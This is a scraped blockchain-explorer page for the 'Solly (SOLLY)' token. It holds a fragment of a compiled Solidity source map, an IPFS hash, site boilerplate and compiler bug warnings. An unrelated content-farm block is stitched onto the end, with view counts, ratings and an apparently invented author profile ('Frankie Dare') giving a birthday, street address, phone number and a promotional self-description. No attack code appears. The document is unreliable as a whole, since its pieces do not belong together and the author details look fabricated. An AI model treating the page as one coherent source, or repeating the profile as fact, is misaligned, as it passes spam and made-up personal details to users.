;4958:2;4938:18;;;4931:30;4997:34;4977:18;;;4970:62;-1:-1:-1;;;5048:18:1;;;5041:35;5093:19;;11661:68:0;4717:401:1;11661:68:0;-1:-1:-1;;;;;11748:16:0;;11740:64;;;;-1:-1:-1;;;11740:64:0;;5325:2:1;11740:64:0;;;5307:21:1;5364:2;5344:18;;;5337:30;5403:34;5383:18;;;5376:62;-1:-1:-1;;;5454:18:1;;;5447:33;5497:19;;11740:64:0;5123:399:1;11740:64:0;11818:24;11845:27;11863:1;11867:4;11845:9;:27::i;:::-;11818:54;-1:-1:-1;11893:21:0;;11885:70;;;;-1:-1:-1;;;11885:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;11982:15:0;;11968:11;11982:15;;;;;;;;;;;;;12092:10;;12064:22;;11982:15;;12026:6;;12092:10;;12057:30;;12064:22;;11992:4;;12064:22;;:::i;:::-;;;;-1:-1:-1;;12064:22:0;;;;;;;;;;12057:30;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;12049:53;12045:121;;12136:3;12127:6;:12;:27;;12151:3;12127:27;;;12142:6;12127:27;12119:35;;12045:121;12201:5;12194:3;:12;;12186:63;;;;-1:-1:-1;;;12186:63:0;;5729:2:1;12186:63:0;;;5711:21:1;5768:2;5748:18;;;5741:30;5807:34;5787:18;;;5780:62;-1:-1:-1;;;5858:18:1;;;5851:36;5904:19;;12186:63:0;5527:402:1;12186:63:0;12278:14;:3;12286:5;12278:7;:14::i;:::-;-1:-1:-1;;;;;12260:15:0;;;:9;:15;;;;;;;;;;;:32;;;;12365:13;;;;;;;:25;;12383:6;12365:17;:25::i;:::-;-1:-1:-1;;;;;12349:13:0;;;:9;:13;;;;;;;;;;;;:41;;;;12409:26;1445:25:1;;;12349:13:0;;12409:26;;;;;;1418:18:1;12409:26:0;;;;;;;11650:793;;;11572:871;;;:::o;3995:136::-;4053:7;4080:43;4084:1;4087;4080:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4073:50;3995:136;-1:-1:-1;;;3995:136:0:o;3529:182::-;3587:7;;3619:5;3623:1;3619;:5;:::i;:::-;3607:17;;3648:1;3643;:6;;3635:46;;;;-1:-1:-1;;;3635:46:0;;6398:2:1;3635:46:0;;;6380:21:1;6437:2;6417:18;;;6410:30;-1:-1:-1;;;6456:18:1;;;6449:57;6523:18;;3635:46:0;6196:351:1;4435:193:0;4521:7;4557:12;4549:6;;;;4541:29;;;;-1:-1:-1;;;4541:29:0;;;;;;;;:::i;:::-;-1:-1:-1;4581:9:0;4593:5;4597:1;4593;:5;:::i;:::-;4581:17;4435:193;-1:-1:-1;;;;;4435:193:0:o;14:250:1:-;99:1;109:113;123:6;120:1;117:13;109:113;;;199:11;;;193:18;180:11;;;173:39;145:2;138:10;109:113;;;-1:-1:-1;;256:1:1;238:16;;231:27;14:250::o;269:396::-;418:2;407:9;400:21;381:4;450:6;444:13;493:6;488:2;477:9;473:18;466:34;509:79;581:6;576:2;565:9;561:18;556:2;548:6;544:15;509:79;:::i;:::-;649:2;628:15;-1:-1:-1;;624:29:1;609:45;;;;656:2;605:54;;269:396;-1:-1:-1;;269:396:1:o;670:173::-;738:20;;-1:-1:-1;;;;;787:31:1;;777:42;;767:70;;833:1;830;823:12;767:70;670:173;;;:::o;848:254::-;916:6;924;977:2;965:9;956:7;952:23;948:32;945:52;;;993:1;990;983:12;945:52;1016:29;1035:9;1016:29;:::i;:::-;1006:39;1092:2;1077:18;;;;1064:32;;-1:-1:-1;;;848:254:1:o;1481:328::-;1558:6;1566;1574;1627:2;1615:9;1606:7;1602:23;1598:32;1595:52;;;1643:1;1640;1633:12;1595:52;1666:29;1685:9;1666:29;:::i;:::-;1656:39;;1714:38;1748:2;1737:9;1733:18;1714:38;:::i;:::-;1704:48;;1799:2;1788:9;1784:18;1771:32;1761:42;;1481:328;;;;;:::o;1814:186::-;1873:6;1926:2;1914:9;1905:7;1901:23;1897:32;1894:52;;;1942:1;1939;1932:12;1894:52;1965:29;1984:9;1965:29;:::i;2194:260::-;2262:6;2270;2323:2;2311:9;2302:7;2298:23;2294:32;2291:52;;;2339:1;2336;2329:12;2291:52;2362:29;2381:9;2362:29;:::i;:::-;2352:39;;2410:38;2444:2;2433:9;2429:18;2410:38;:::i;:::-;2400:48;;2194:260;;;;;:::o;2459:380::-;2538:1;2534:12;;;;2581;;;2602:61;;2656:4;2648:6;2644:17;2634:27;;2602:61;2709:2;2701:6;2698:14;2678:18;2675:38;2672:161;;2755:10;2750:3;2746:20;2743:1;2736:31;2790:4;2787:1;2780:15;2818:4;2815:1;2808:15;2672:161;;2459:380;;;:::o;2844:221::-;3018:2;2989:15;;;;-1:-1:-1;;;;;;2985:45:1;2973:58;;3056:2;3047:12;;2844:221::o;3070:287::-;3199:3;3237:6;3231:13;3253:66;3312:6;3307:3;3300:4;3292:6;3288:17;3253:66;:::i;:::-;3335:16;;;;;3070:287;-1:-1:-1;;3070:287:1:o;3362:184::-;3432:6;3485:2;3473:9;3464:7;3460:23;3456:32;3453:52;;;3501:1;3498;3491:12;3453:52;-1:-1:-1;3524:16:1;;3362:184;-1:-1:-1;3362:184:1:o;3551:400::-;3753:2;3735:21;;;3792:2;3772:18;;;3765:30;3831:34;3826:2;3811:18;;3804:62;-1:-1:-1;;;3897:2:1;3882:18;;3875:34;3941:3;3926:19;;3551:400::o;5934:127::-;5995:10;5990:3;5986:20;5983:1;5976:31;6026:4;6023:1;6016:15;6050:4;6047:1;6040:15;6066:125;6131:9;;;6152:10;;;6149:36;;;6165:18;;:::i;6552:128::-;6619:9;;;6640:11;;;6637:37;;;6654:18;;:::i

Swarm Source

ipfs://10b09790a8dba57dc82105296c7b7f833eff30d6a413510565df51c893f0a9ac

Loading...

Loading

[Download: CSV Export ]

[Download: CSV Export ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.

Connect a Wallet
Connect a Wallet

Compiler specific version warnings:

The compiled contract might be susceptible to VerbatimInvalidDeduplication (low-severity), FullInlinerNonExpressionSplitArgumentEvaluationOrder (low-severity), MissingSideEffectsOnSelectorAccess (low-severity) Solidity Compiler Bugs.

Solly (SOLLY) Token Tracker | BscScan (2024)

References

Top Articles
Latest Posts
Article information

Author: Frankie Dare

Last Updated:

Views: 6364

Rating: 4.2 / 5 (73 voted)

Reviews: 80% of readers found this page helpful

Author information

Name: Frankie Dare

Birthday: 2000-01-27

Address: Suite 313 45115 Caridad Freeway, Port Barabaraville, MS 66713

Phone: +3769542039359

Job: Sales Manager

Hobby: Baton twirling, Stand-up comedy, Leather crafting, Rugby, tabletop games, Jigsaw puzzles, Air sports

Introduction: My name is Frankie Dare, I am a funny, beautiful, proud, fair, pleasant, cheerful, enthusiastic person who loves writing and wants to share my knowledge and understanding with you.